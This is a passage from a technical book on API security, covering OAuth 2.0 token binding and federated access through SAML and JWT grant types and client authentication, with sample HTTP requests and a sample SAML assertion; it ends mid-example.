It’s up to the higher-level protocols to define it. The RFC 8473 defines how to carry the token binding message over an HTTP connection (see Figure 11-2). Figure 11-2. The responsibilities of each layer in a token binding flow Chapter 11 Oauth 2.0 tOken Binding 246 TLS Extension for Token Binding Protocol Negotiation To bind security tokens to the TLS connection, the client and the server need to first agree upon the token binding protocol (we’ll discuss about this later) version and the parameters (signature algorithm, length) related to the token binding key. This is accomplished by a new TLS extension without introducing additional network roundtrips in TLS 1.2 and earlier versions. The token binding protocol version reflects the protocol version defined by the Token Binding Protocol (RFC 8471)—and the key parameters are defined by the same specification itself. The client uses the Token Binding TLS extension to indicate the highest supported token binding protocol version and key parameters. This happens with the Client Hello message in the TLS handshake. To support the token binding specification, both the client and the server should support the token binding protocol negotiation extension. The server uses the Token Binding TLS extension to indicate the support for the token binding protocol and to select the protocol version and key parameters. The server that supports token binding and receives a Client Hello message containing the Token Binding extension will include the Token Binding extension in the Server Hello if the required conditions are satisfied. If the Token Binding extension is included in the Server Hello and the client supports the token binding protocol version selected by the server, it means that the version and key parameters have been negotiated between the client and the server and shall be definitive for the TLS connection. If the client does not support the token binding protocol version selected by the server, then the connection proceeds without token binding. Every time a new TLS connection is negotiated (TLS handshake) between the client and the server, a token binding negotiation happens too. Even though the negotiation happens repeatedly by the TLS connection, the token bindings (you will learn more about this later) are long-lived; they encompass multiple TLS connections and TLS sessions between a given client and server. In practice, Nginx (https://github.com/google/ngx_token_binding) and Apache (https://github.com/zmartzone/mod_token_binding) have support for token binding. An implementation of Token Binding Protocol Negotiation TLS Extension in Java is available here: https://github.com/pingidentity/java10-token-binding- negotiation. Chapter 11 Oauth 2.0 tOken Binding 247 Key Generation The Token Binding Protocol specification (RFC 8471) defines the parameters related to key generation. These are the ones agreed upon during the negotiation phase. • If rsa2048_pkcs1.5 key parameter is used during the negotiation phase, then the signature is generated using the RSASSA-PKCS1-v1_5 signature scheme as defined in RFC 3447 with SHA256 as the hash function. • If rsa2048_pss key parameter is used during the negotiation phase, then the signature is generated using the RSASSA-PSS signature scheme as defined in RFC 3447 with SHA256 as the hash function. • If ecdsap256 key parameter is used during the negotiation phase, the signature is generated with ECDSA using Curve P-256 and SHA256 as defined in ANSI.X9–62.2005 and FIPS.186–4.2013. In case a browser acts as the client, then the browser itself has to generate the keys and maintain them against the hostname of the server. You can find the status of this feature development for Chrome from here (www.chromestatus.com/ feature/5097603234529280). Then again the token binding is not only for a browser, it’s useful in all the interactions between a client and a server—irrespective of the client being thin or thick. Proof of Possession A token binding is established by a user agent (or the client) generating a private/ public key pair (possibly, within a secure hardware module, such as trusted platform module (TPM)) per target server, providing the public key to the server, and proving the possession of the corresponding private key, on every TLS connection to the server. The generated public key is reflected in the token binding ID between the client and the server. At the server end, the verification happens in two steps. First, the server receiving the token binding message needs to verify that the key parameters in the message match with the token binding parameters negotiated and then validate the signature contained in the token binding message. All the key parameters and the signature are embedded into the token binding message. Chapter 11 Oauth 2.0 tOken Binding 248 The structure of the token binding message is defined in the Token Binding Protocol specification (RFC 8471). A token binding message can have multiple token bindings (see Figure 11-3). A given token binding includes the token binding ID, the type of the token binding (provided or referred—we’ll talk about this later), extensions, and the signature over the concatenation of exported keying material (EKM) from the TLS layer, token binding type, and key parameters. The token binding ID reflects the derived public key along with the key parameters agreed upon the token binding negotiation. Once the TLS connection is established between a client and a server, the EKM will be the same—both at the client end and at the server end. So, to verify the signature, the server can extract the EKM from the underneath TLS connection and use the token binding type and key parameters embedded into the token binding message itself. The signature is validated against the embedded public key (see Figure 11-3). Figure 11-3. The structure of the token binding message How to carry the token binding message from the client to the server is not defined in the Token Binding Protocol specification, but in the Token Binding for HTTP specification or the RFC 8473. In other words, the core token binding specification lets the higher-level protocols make the decision on that. The Token Binding for HTTP specification introduces a new HTTP header called Sec-Token-Binding—and it carries the base64url-encoded value of the token binding message. The Sec-Token-Binding Chapter 11 Oauth 2.0 tOken Binding 249 header field MUST NOT be included in HTTP responses—MUST include only once in an HTTP request. Once the token binding message is accepted as valid, the next step is to make sure that the security tokens carried in the corresponding HTTP connection are bound to it. Different security tokens can be transported over HTTP—for example, cookies and OAuth 2.0 tokens. In the case of OAuth 2.0, how the authorization code, access token, and refresh token are bound to the HTTP connection is defined in the OAuth 2.0 Token Binding specification (https://tools.ietf.org/html/draft-ietf-oauth-token- binding- 08). Token Binding for OAuth 2.0 Refresh Token Let’s see how the token binding works for OAuth 2.0 refresh tokens. A refresh token, unlike authorization code and access token, is only used between the client and the authorization server. Under the OAuth 2.0 authorization code grant type, the client first gets the authorization code and then exchanges it to an access token and a refresh token by talking to the token endpoint of the OAuth 2.0 authorization server (see Chapter 4 for details). The following flow assumes the client has already got the authorization code (see Figure 11-4). Figure 11-4. OAuth 2.0 refresh grant type 1. The connection between the client and the authorization server must be on TLS. 2. The client which supports OAuth 2.0 token binding, during the TLS handshake itself, negotiates the required parameters with the authorization server, which too supports OAuth 2.0 token binding. Chapter 11 Oauth 2.0 tOken Binding 250 3. Once the TLS handshake is completed, the OAuth 2.0 client will generate a private key and a public key and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. (To be precise, the client will sign EKM + token binding type + key parameters.) 4. The base64url-encoded token binding message will be added as the value to the Sec- Token- Binding HTTP header to the connection between the client and the OAuth 2.0 authorization server. 5. The client will send a standard OAuth request to the token endpoint along with the Sec-Token-Binding HTTP header. 6. The authorization server validates the value of Sec-Token-Binding header, including the signature, and records the token binding ID (which is also included in the token binding message) against the issued refresh token. To make the process stateless, the authorization server can include the hash of the token binding ID into the refresh token itself—so it does not need to remember/ store it separately. 7. Later, the OAuth 2.0 client tries to use the refresh token against the same token endpoint to refresh the access token. Now, the client has to use the same private key and public key pair used before to generate the token binding message and, once again, includes the base64url-encoded value of it to the Sec-Token-Binding HTTP header. The token binding message has to carry the same token binding ID as in the case where the refresh token was originally issued. 8. The OAuth 2.0 authorization server now must validate the Sec- Token-Binding HTTP header and then needs to make sure that the token binding ID in the binding message is the same as the original token binding ID attached to the refresh token in the same request. This check will make sure that the refresh token cannot be used outside the original token binding. In case the authorization server decides to embed the hashed value of the Chapter 11 Oauth 2.0 tOken Binding 251 token binding ID to the refresh token itself, now it has to calculate the hash of the token binding ID in the Sec-Token-Binding HTTP header and compare it with what is embedded into the refresh token. 9. If someone steals the refresh token and is desperate to use it outside the original token binding, then he/she also has to steal the private/public key pair corresponding to the connection between the client and the server. There are two types of token bindings—and what we discussed with respect to the refresh token is known as provided token binding. This is used when the token exchange happens directly between the client and the server. The other type is known as referred token binding, which is used when requesting tokens, which are intended to present to a different server—for example, the access token. The access token is issued in a connection between the client and the authorization server—but used in a connection between the client and the resource server. Token Binding for OAuth 2.0 Authorization Code/Access Token Let’s see how the token binding works for access tokens, under the authorization code grant type. Under the OAuth 2.0 authorization code grant type, the client first gets the authorization code via the browser (user agent) and then exchanges it to an access token and a refresh token by talking to the token endpoint of the OAuth 2.0 authorization server (see Figure 11-5). Chapter 11 Oauth 2.0 tOken Binding 252 1. When the end user clicks the login link on the OAuth 2.0 client application on the browser, the browser has to do an HTTP GET to the client application (which is running on a web server), and the browser has to establish a TLS connection with the OAuth 2.0 client first. The browser, which supports OAuth 2.0 token binding, during the TLS handshake itself, negotiates the required parameters with the client application, which too supports OAuth 2.0 token binding. Once the TLS handshake is completed, the browser will generate a private key and public key (for the client domain) and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. The base64url-encoded token binding message will be added as the value to the Sec-Token-Binding HTTP header to the connection between the browser and the OAuth 2.0 client—which is the HTTP GET. 2. In response to step 1 (assuming all the token binding validations are done), the client will send a 302 response to the browser, asking to redirect the user to the OAuth 2.0 authorization server. Also in the response, the client will include the HTTP header Include- Referred-Token-Binding-ID, which is set to true. This instructs the Figure 11-5. OAuth 2.0 authorization code flow Chapter 11 Oauth 2.0 tOken Binding 253 browser to include the token binding ID established between the browser and the client in the request to the authorization server. Also, the client application will include two additional parameters in the request: code_challenge and code_challenge_method. These parameters are defined in the Proof Key for Code Exchange (PKCE) or RFC 7636 for OAuth 2.0. Under token binding, these two parameters will carry static values, code_challenge=referred_tb and code_challenge_method=referred_tb. 3. The browser, during the TLS handshake itself, negotiates the required parameters with the authorization server. Once the TLS handshake is completed, the browser will generate a private key and public key (for the authorization server domain) and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. The client will send the standard OAuth request to the authorization endpoint along with the Sec-Token- Binding HTTP header. This Sec-Token-Binding HTTP header now includes two token bindings (in one token binding message—see Figure 11-3), one for the connection between the browser and the authorization server, and the other one is for the browser and the client application (referred binding). 4. The authorization server redirects the user back to the OAuth client application via browser—along with the authorization code. The authorization code is issued against the token binding ID in the referred token binding. 5. The browser will do a POST to the client application, which also includes the authorization code from the authorization server. The browser will use the same token binding ID established between itself and the client application—and adds the Sec-Token- Binding HTTP header. 6. Once the client application gets the authorization code (and given that the Sec- Token- Binding validation is successful), it will now talk to the authorization server’s token endpoint. Chapter 11 Oauth 2.0 tOken Binding 254 Prior to that, the client has to establish a token binding with the authorization server. The token request will also include the code_verifier parameter (defined in the PKCE RFC), which will carry the provided token binding ID between the client and the browser—which is also the token binding ID attached to the authorization code. Since the access token, which will be issued by the authorization server, is going to be used against a protected resource, the client has to include the token binding between itself and the resource server into this token binding message as a referred binding. Upon receiving the token request, the OAuth 2.0 authorization server now must validate the Sec-Token-Binding HTTP header and then needs to make sure that the token binding ID in the code_verifier parameter is the same as the original token binding ID attached to the authorization code at the point of issuing it. This check will make sure that the code cannot be used outside the original token binding. Then the authorization server will issue an access token, which is bound to the referred token binding, and a refresh token, which is bound to the connection between the client and the authorization server. 7. The client application now invokes an API in the resource server passing the access token. This will carry the token binding between the client and the resource server. 8. The resource server will now talk to the introspection endpoint of the authorization server—and it will return back the binding ID attached to the access token, so the resource server can check whether it’s the same binding ID used between itself and the client application. TLS Termination Many production deployments do include a reverse proxy—which terminates the TLS connection. This can be at an Apache or Nginx server sitting between the client and the server. Once the connection is terminated at the reverse proxy, the server has no clue what happened at the TLS layer. To make sure the security tokens are bound to the Chapter 11 Oauth 2.0 tOken Binding 255 incoming TLS connection, the server has to know the token binding ID. The HTTPS Token Binding with TLS Terminating Reverse Proxies, the draft specification (https:// tools.ietf.org/html/draft-ietf-tokbind-ttrp-09), standardizes how the binding IDs are passed from the reverse proxy to the back-end server, as HTTP headers. The Provided-Token-Binding-ID and Referred-Token-Binding-ID HTTP headers are introduced by this specification (see Figure 11-6). Figure 11-6. The reverse proxy passes the Provided-Token-Binding-ID and Referred-Token-Binding-ID HTTP headers to the backend server Summary • OAuth 2.0 token binding proposal cryptographically binds security tokens to the TLS layer, preventing token export and replay attacks. • Token binding relies on TLS—and since it binds the tokens to the TLS connection itself, anyone who steals a token cannot use it over a different channel. • We can break down the token binding protocol into three main phases: negotiation phase, key generation phase, and proof of possession phase. • During the negotiation phase, the client and the server negotiate a set of parameters to use for token binding between them. • During the key generation phase, the client generates a key pair according to the parameters negotiated in the negotiation phase. • During the proof of possession phase, the client uses the keys generated in the key generation phase to prove the possession. Chapter 11 Oauth 2.0 tOken Binding 257 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_12 CHAPTER 12 Federating Access to APIs One of the research performed by Quocirca (analyst and research company) confirms that many businesses now have more external users who interact with enterprise applications than internal ones. In Europe, 58% of businesses transact directly with users from other firms and/or consumers. In the United Kingdom alone, the figure is 65%. If you look at recent history, most enterprises today grow via acquisitions, mergers, and partnerships. In the United States alone, the volume of mergers and acquisitions totaled $865.1 billion in the first nine months of 2013, according to Dealogic. That’s a 39% increase over the same period of the previous year and the highest nine-month total since 2008. What does this mean for securing APIs? You need to have the ability to deal with multiple heterogeneous security systems across borders. Enabling Federation Federation, in the context of API security, is about propagating user identities across distinct identity management systems or distinct enterprises. Let’s start with a simple use case where you have an API exposed to your partners. How would you authenticate users for this API from different partners? These users belong to the external partners and are managed by them. HTTP Basic authentication won’t work. You don’t have access to the external users’ credentials, and, at the same time, your partners won’t expose an LDAP or a database connection outside their firewall to external parties. Asking for usernames and passwords simply doesn’t work in a federation scenario. Would OAuth 2.0 work? To access an API secured with OAuth, the client must present an access token issued by the owner of the API or issued by an entity that your API trusts. Users from external parties have to authenticate first with the OAuth authorization server that the API trusts and then obtain an access token. Ideally, the authorization server the API trusts is from the same domain as the API. Neither the authorization code grant type nor the implicit grant type mandates how to authenticate users at the authorization server. It’s up to the authorization server to 258 decide. If the user is local to the authorization server, then it can use a username and password or any other direct authentication protocol. If the user is from an external entity, then you have to use some kind of brokered authentication. Brokered Authentication With brokered authentication, at the time of authentication, the local authorization server (running in the same domain as the API) does not need to trust each and every individual user from external parties. Instead, it can trust a broker from a given partner domain (see Figure 12-1). Each partner should have a trust broker whose responsibility is to authenticate its own users (possibly through direct authentication) and then pass the authentication decision back to the local OAuth authorization server in a reliable and trusted manner. In practice, an identity provider running in the user’s (in our case, the partner employees’) home domain plays the role of a trust broker. Figure 12-1. Brokered authentication for OAuth client applications Chapter 12 Federating aCCess to apis 259 The trust relationship between the brokers from partners and the local OAuth authorization server (or between two federation domains) must be established out of band. In other words, it has to be established with a prior agreement between two parties. In most scenarios, trust between different entities is established through X.509 certificates. Let’s walk through a sample brokered authentication use case. Going back to OAuth principles, you need to deal with four entities in a federation scenario: the resource owner, the resource server, the authorization server, and the client application. All these entities can reside in the same domain or in different ones. Let’s start with the simplest scenario first. The resource owner (user), resource server (API gateway), and authorization server are in a single domain, and the client application (web app) is in a different domain. For example, you’re an employee of Foo Inc. and want to access a web application hosted by Bar Inc. (see Figure 12-1). Once you log in to a web application at Bar Inc., it needs to access an API hosted in Foo Inc. on your behalf. Using OAuth terminology, you’re the resource owner, and the API is hosted in the resource server. Both you and API are from the Foo domain. The web application hosted by Bar Inc. is the OAuth client application. Figure 12-1 illustrates how brokered authentication works for an OAuth client application. • The resource owner (user) from Foo Inc. visits the web application at Bar Inc. (step 1). • To authenticate the user, the web application redirects the user to the OAuth authorization server at Foo Inc., which is also the home domain of the resource owner (step 2). To use the OAuth authorization code grant type, the web application also needs to pass its client ID along with the authorization code grant request during the redirection. At this time, the authorization server won’t authenticate the client application but only validates its existence. In a federation scenario, the authorization server does not need to trust each and every individual application (or OAuth client); rather, it trusts the corresponding domain. The authorization server accepts authorization grant requests from any client that belongs to a trusted domain. This also avoids the cost of client registration. You don’t need to register each client application from Bar Inc.—instead, you can build a trust relationship between the authorization server from Chapter 12 Federating aCCess to apis 260 Foo Inc. and the trust broker from Bar Inc. During the authorization code grant phase, the authorization server only needs to record the client ID. It doesn’t need to validate the client’s existence. Note the oauth client identifier (id) isn’t treated as a secret. it’s publicly visible to anyone. • Once the client application gets the authorization code from the authorization server (step 3), the next step is to exchange it for a valid access token. This step requires client authentication. • Because the authorization server doesn’t trust each individual application, the web application must first authenticate to its own trust broker in its own domain (step 4) and get a signed assertion (step 5). This signed assertion can be used as a token of proof against the authorization server in Foo Inc. • The authorization server validates the signature of the assertion and, if it’s signed by an entity it trusts, returns the corresponding access token to the client application (steps 6 and 7). • The client application can use the access token to access the APIs in Foo Inc. on behalf of the resource owner (step 8), or it can talk to a user endpoint at Foo Inc. to get more information about the user. Note the definition of assertion, according to the oxford english dictionary, is “a confident and forceful statement of fact or belief.” the fact or belief here is that the entity that brings this assertion is an authenticated entity at the trust broker. if the assertion isn’t signed, anyone in the middle can alter it. once the trust broker (or the asserting party) signs the assertion with its private key, no one in the middle can alter it. if it’s altered, any alterations can be detected at the authorization server during signature validation. the signature is validated using the corresponding public key of the trust broker. Chapter 12 Federating aCCess to apis 261 Security Assertion Markup Language (SAML) Security Assertion Markup Language (SAML) is an OASIS standard for exchanging authentication, authorization, and identity-related data between interested parties in an XML-based data format. SAML 1.0 was adopted as an OASIS standard in 2002, and in 2003 SAML 1.1 was ratified as an OASIS standard. At the same time, the Liberty Alliance donated its Identity Federation Framework to OASIS. SAML 2.0 became an OASIS standard in 2005 by converging SAML 1.1, Liberty Alliance’s Identity Federation Framework, and Shibboleth 1.3. SAML 2.0 has four basic elements: • Assertions: Authentication, Authorization, and Attribute assertions. • Protocol: Request and Response elements to package SAML assertions. • Bindings: How to transfer SAML messages between interested parties. HTTP binding and SOAP binding are two examples. If the trust broker uses a SOAP message to transfer a SAML assertion, then it has to use the SOAP binding for SAML. • Profiles: How to aggregate the assertions, protocol, and bindings to address a specific use case. A SAML 2.0 Web Single Sign-On (SSO) profile defines a standard way to establish SSO between different service providers via SAML. Note the blog post at http://blog.facilelogin.com/2011/11/depth- of- saml-saml-summary.html provides a high-level overview of saML. SAML 2.0 Client Authentication To achieve client authentication with the SAML 2.0 profile for OAuth 2.0, you can use the parameter client_assertion_type with the value urn:ietf:params:oauth:client- assertion- type:saml2-bearer in the access token request (see step 6 in Figure 12-1). The OAuth flow starts from step 2. Chapter 12 Federating aCCess to apis 262 Now let’s dig into each step. The following shows a sample authorization code grant request initiated by the web application at Bar Inc.: GET /authorize?response_type=code &client_id=wiuo879hkjhkjhk3232 &state=xyz &redirect_uri=https://bar.com/cb HTTP/1.1 Host: auth.foo.com This results in the following response, which includes the requested authorization code: HTTP/1.1 302 Found Location: https://bar.com/cb?code=SplwqeZQwqwKJjklje&state=xyz So far it’s the normal OAuth authorization code flow. Now the web application has to talk to the trust broker in its own domain to obtain a SAML assertion. This step is outside the scope of OAuth. Because this is machine-to-machine authentication (from the web application to the trust broker), you can use a SOAP-based WS-Trust protocol to obtain the SAML assertion or any other protocol like OAuth 2.0 Token Delegation profile, which we discussed in Chapter 9. The web application does not need to do this each time a user logs in; it can be one-time operation that is governed by the lifetime of the SAML assertion. The following is a sample SAML assertion obtained from the trust broker: <saml:Assertion > <saml:Issuer>bar.com</saml:Issuer> <ds:Signature> <ds:SignedInfo></ds:SignedInfo> <ds:SignatureValue></ds:SignatureValue> <ds:KeyInfo></ds:KeyInfo> </ds:Signature> <saml:Subject> <saml:NameID>18982198kjk2121</saml:NameID> <saml:SubjectConfirmation> <saml:SubjectConfirmationData NotOnOrAfter="2019-10-05T19:30:14.654Z" Recipient="https://foo.com/oauth2/token"/> Chapter 12 Federating aCCess to apis 263 </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2019-10-05T19:25:14.654Z" NotOnOrAfter="2019-10-05T19:30:14.654Z"> <saml:AudienceRestriction> <saml:Audience> https://foo.com/oauth2/token </saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2019-10-05T19:25:14.655Z"> <saml:AuthnContext> <saml:AuthnContextClassRef> urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified </saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> To use this SAML assertion in an OAuth flow to authenticate the client, it must adhere to the following rules: • The assertion must have a unique identifier for the Issuer element, which identifies the token-issuing entity. In this case, the broker of the Bar Inc. • The assertion must have a NameID element inside the Subject element that uniquely identifies the client application (web app). This is treated as the client ID of the client application at the authorization server. • The SubjectConfirmation method must be set to urn:oasis:names: tc:SAML:2.0:cm:bearer. • If the assertion issuer authenticates the client, then the assertion must have a single AuthnStatement. Chapter 12 Federating aCCess to apis 264 Note Ws-trust is an oasis standard for soap message security. Ws-trust, which is built on top of the Ws-security standard, defines a protocol to exchange identity information that is wrapped in a token (saML), between two trust domains. the blog post at http://blog.facilelogin.com/2010/05/ws-trust-with- fresh-banana-service.html explains Ws-trust at a high level. the latest Ws-trust specification is available at http://docs.oasis-open.org/ws-sx/ ws-trust/v1.4/errata01/ws-trust-1.4-errata01-complete.html. Once the client web application gets the SAML assertion from the trust broker, it has to base64url-encode the assertion and send it to the authorization server along with the access token request. In the following sample HTTP POST message, client_assertion_ type is set to urn:ietf:params:oauth:client-assertion-type:saml2-bearer, and the base64url-encoded (see Appendix E) SAML assertion is set to the client_assertion parameter: POST /token HTTP/1.1 Host: auth.foo.com Content-Type: application/x-www-form-urlencoded grant_type=authorization_code&code=SplwqeZQwqwKJjklje &client_assertion_type=urn:ietf:params:oauth:client-assertion-type:saml2- bearer &client_assertion=HdsjkkbKLew...[omitted for brevity]...OT Once the authorization server receives the access token request, it validates the SAML assertion. If it’s valid (signed by a trusted party), an access token is issued, along with a refresh token. SAML Grant Type for OAuth 2.0 The previous section explained how to use a SAML assertion to authenticate a client application. That is one federation use case that falls under the context of OAuth. There the trust broker was running inside Bar Inc., where the client application was running. Let’s consider a use case where the resource server (API), the authorization server, and the client application run in the same domain (Bar Inc.), while the user is from an outside domain (Foo Inc.). Here the end user authenticates to the web application with a SAML assertion Chapter 12 Federating aCCess to apis 265 (see Figure 12-2). A trust broker (a SAML identity provider) in the user’s domain issues this assertion. The client application uses this assertion to talk to the local authorization server to obtain an access token to access an API on behalf of the logged-in user. Figure 12-2. Brokered authentication with the SAML grant type for OAuth 2.0 Figure 12-2 illustrates how brokered authentication with a SAML grant type for OAuth 2.0 works. • The first three steps are outside the scope of OAuth. The resource owner first logs in to the web application owned by Bar Inc. via SAML 2.0 Web SSO. • The SAML 2.0 Web SSO flow is initiated by the web application by redirecting the user to the SAML identity provider at Foo Inc. (step 2). • Once the user authenticates to the SAML identity provider, the SAML identity provider creates a SAML response (which wraps the assertion) and sends it back to the web application (step 3). The web application validates the signature in the SAML assertion and, if a trusted identity provider signs it, allows the user to log in to the web application. Chapter 12 Federating aCCess to apis 266 • Once the user logs in to the web application, the web application has to exchange the SAML assertion for an access token by talking to its own internal authorization server (steps 4 and 5). The way to do this is defined in the SAML 2.0 Profile for OAuth 2.0 Client Authentication and Authorization Grants specification (RFC 7522). The following is a sample POST message from the web application to the authorization server. There the value of grant_type must be urn:ietf:params:oauth: grant-type:saml2-bearer, and the base64url-encoded SAML assertion is set as the value of the assertion parameter: Note no refresh tokens are issued under the saML Bearer grant type. the lifetime of the access token should not exceed the lifetime of the saML bearer assertion by a significant amount. POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded grant_type=urn:ietf:params:oauth:grant-type:saml2-bearer &assertion=QBNhbWxwOl...[omitted for brevity]...OT4 This request is validated at the authorization server. The SAML assertion is once again validated via its signature; and, if a trusted identity provider signs it, the authorization server issues a valid access token. The scope of the access token issued under the SAML Bearer grant type should be set out of band by the resource owner. Out of band here indicates that the resource owner makes a pre-agreement with the resource server/authorization server with respect to the scope associated with a given resource when the SAML grant type is being used. The client application can include a scope parameter in the authorization grant request, but the value of the scope parameter must be a subset of the scope defined out of band by the resource owner. If no scope parameter is included in the authorization grant request, then the access token inherits the scope set out of band. Both federation use cases discussed assume that the resource server and the authorization server are running in the same domain. If that isn’t the case, the resource server must invoke an API exposed by the authorization server to validate the access Chapter 12 Federating aCCess to apis 267 token at the time the client tries to access a resource. If the authorization server supports the OAuth Introspection specification (discussed in Chapter 9), the resource server can talk to the introspection endpoint and find out whether the token is active or not and also what scopes are associated with the token. The resource server can then check whether the token has the required set of scopes to access the resource. JWT Grant Type for OAuth 2.0 The JSON Web Token (JWT) profile for OAuth 2.0, which is defined in the RFC 7523, extends the OAuth 2.0 core specification by defining its own authorization grant type and a client authentication mechanism. An authorization grant in OAuth 2.0 is an abstract representation of the temporary credentials granted to the OAuth 2.0 client by the resource owner to access a resource. The OAuth 2.0 core specification defines four grant types: authorization code, implicit, resource owner password, and client credentials. Each of these grant types defines in a unique way how the resource owner can grant delegated access to a resource he/she owns to an OAuth 2.0 client. The JWT grant type, which we discuss in this chapter, defines how to exchange a JWT for an OAuth 2.0 access token. In addition to the JWT grant type, the RFC 7523 also defines a way to authenticate an OAuth 2.0 client in its interactions with an OAuth 2.0 authorization server. OAuth 2.0 does not define a concrete way for client authentication, even though in most of the cases it’s the HTTP Basic authentication with client id and the client secret. The RFC 7523 defines a way to authenticate an OAuth 2.0 client using a JWT. The JWT authorization grant type assumes that the client is in possession with a JWT. This JWT can be a self-issued JWT or a JWT obtained from an identity provider. Based on who signs the JWT, one can differentiate a self-issued JWT from an identity provider–issued JWT. The client itself signs a self-issued JWT, while an identity provider signs the identity provider–issued JWT. In either case, the OAuth authorization server must trust the issuer of the JWT. The following shows a sample JWT authorization grant request, where the value of the grant_type parameter is set to urn:ietf:params:oauth:grant-type:jwt-bearer. POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded Chapter 12 Federating aCCess to apis 268 grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion= eyJhbGciOiJFUzI1NiIsImtpZCI6IjE2In0. eyJpc3Mi[...omitted for brevity...]. J9l-ZhwP[...omitted for brevity...] The Assertion Framework for OAuth 2.0 Client Authentication and Authorization Grants specification, which is the RFC 7521, defines the parameters in the JWT authorization grant request, as listed out in the following: • grant_type: This is a required parameter, which defines the format of the assertion, as understood by the authorization server. The value of grant_type is an absolute URI, and it must be urn:ietf:params:oauth:grant-type:jwt-bearer. • assertion: This is a required parameter, which carries the token. For example, in the case of JWT authorization grant type, the assertion parameter will carry the base64url-encoded JWT, and it must only contain a single JWT. If there are multiple JWTs in the assertion, then the authorization server will reject the grant request. • scope: This is an optional parameter. Unlike in authorization code and implicit grant types, the JWT grant type does not have a way to get the resource owner’s consent for a requested scope. In such case, the authorization server will establish the resource owner’s consent via an out-of-band mechanism. If the authorization grant request carries a value for the scope parameter, then either it should exactly match the out-of-band established scope or less than that. Note the oauth authorization server will not issue a refresh_token under the JWt grant type. if the access_token expires, then the oauth client has to get a new JWt (if the JWt has expired) or use the same valid JWt to get a new access_token. the lifetime of the access_token should match the lifetime of the corresponding JWt. Chapter 12 Federating aCCess to apis 269 Applications of JWT Grant Type There are multiple applications of the JWT authorization grant type. Let’s have a look at one common use case, where the end user or the resource owner logs in to a web application via OpenID Connect (Chapter 6), then the web application needs to access an API on behalf of the logged-in user, which is secured with OAuth 2.0. Figure 12-3 shows the key interactions related to this use case. Figure 12-3. JWT grant type, a real-world example The following lists out all the interactions as illustrated in Figure 12-3 by the number: • The end user visits the web application (step 1). • In step 2, the user gets redirected to the OpenID Connect server and authenticates against the Active Directory connected to it. After the authentication, the user gets redirected back to the web application, with an authorization code (assuming that we are using OAuth 2.0 authorization code grant type). • The web application talks directly to the OpenID Connect server and exchanges the authorization code from the previous step to an ID token and an access token. The ID token itself is a JWT, which is signed by the OpenID Connect server (step 3). Chapter 12 Federating aCCess to apis 270 • Now the web application needs to invoke an API on behalf of the logged-in user. It talks to the OAuth authorization server, trusted by the API, and using the JWT grant type, exchanges the JWT from step 3 to an OAuth access token. The OAuth authorization server validates the JWT and makes sure that it’s being signed by a trusted identity provider. In this case, the OAuth authorization server trusts the OpenID Connect identity provider (step 4). • In step 5, the web application invokes the API with the access token from step 4. • The application server, which hosts the API, validates the access token by talking to the OAuth authorization server, which issued the access token (step 6). JWT Client Authentication The OAuth 2.0 core specification does not define a concrete way to authenticate OAuth clients to the OAuth authorization server. Mostly it’s the HTTP Basic authentication with client_id and the client_secret. The RFC 7523 defines a way to authenticate OAuth clients with a JWT. The JWT client authentication is not just limited to a particular grant type; it can be used with any OAuth grant types. That’s another beauty in OAuth 2.0—the OAuth grant types are decoupled from the client authentication. The following shows a sample request to the OAuth authorization server under the authorization code grant type, which uses JWT client authentication. POST /token HTTP/1.1 Host: auth.bar.com Content-Type: application/x-www-form-urlencoded grant_type=authorization_code& code=n0esc3NRze7LTCu7iYzS6a5acc3f0ogp4& client_assertion_type=urn%3Aietf%3Aparams%3Aoauth%3Aclient-assertion- type%3Ajwt-bearer& client_assertion=eyJhbGciOiJSUzI1NiIsImtpZCI6IjIyIn0. eyJpc3Mi[...omitted for brevity...]. cC4hiUPo[...omitted for brevity...] Chapter 12 Federating aCCess to apis 271 The RFC 7523 uses three additional parameters in the OAuth request to the token endpoint to do the client authentication: client_assertion_type, client_assertion, and client_id (optional). The Assertion Framework for OAuth 2.0 Client Authentication and Authorization Grants specification, which is the RFC 7521, defines these parameters. The following lists them out along with their definitions: • client_assertion_type: This is a required parameter, which defines the format of the assertion, as understood by the OAuth authorization server. The value of client_assertion_type is an absolute URI. For JWT client authentication, this parameter must carry the value urn:ietf:params:oauth:client-assertion- type:jwt-bearer. • client_assertion: This is a required parameter, which carries the token. For example, in the case of JWT client authentication, the client_assertion parameter will carry the base64url-encoded JWT, and it must only contain a single JWT. If there are multiple JWTs in the assertion, then the authorization server will reject the grant request. • client_id: This is an optional parameter. Ideally, the client_id must be present inside the client_assertion itself. If this parameter carries a value, it must match the value of the client_id inside the client_assertion. Having the client_id parameter in the request itself could be useful, as the authorization server does not need to parse the assertion first to identify the client. Applications of JWT Client Authentication The JWT client authentication is used to authenticate a client to an OAuth authorization server with a JWT, instead of using HTTP Basic authentication with client_id and client_secret. Why would someone select JWT client authentication over HTTP Basic authentication? Let’s take an example. Say we have two companies called foo and bar. The foo company hosts a set of APIs, and the bar company has a set of developers who are developing applications against those APIs. Like in most of the OAuth examples we discussed in this book, the bar company has to register with the foo company to obtain Chapter 12 Federating aCCess to apis 272 a client_id and client_secret, in order to access its APIs. Since the bar company develops multiple applications (a web app, a mobile app, a rich client app), the same client_id and client_secret obtained from the foo company need to be shared between multiple developers. This is a bit risky as any one of those developers can pass over the secret keys to anyone else—or even misuse them. To fix this, we can use JWT client authentication. Instead of sharing the client_id and the client_secret with its developers, the bar company can create a key pair (a public key and a private key), sign the public key by the key of the company’s certificate authority (CA), and hand them over to its developers. Now, instead of the shared client_id and client_secret, each developer will have its own public key and private key, signed by the company CA. When talking to the foo company’s OAuth authorization server, the applications will use the JWT client authentication, where its own private key signs the JWT—and the token will carry the corresponding public key. The following code snippet shows a sample decoded JWS header and the payload, which matches the preceding criteria. Chapter 7 explains JWS in detail and how it relates to JWT. { 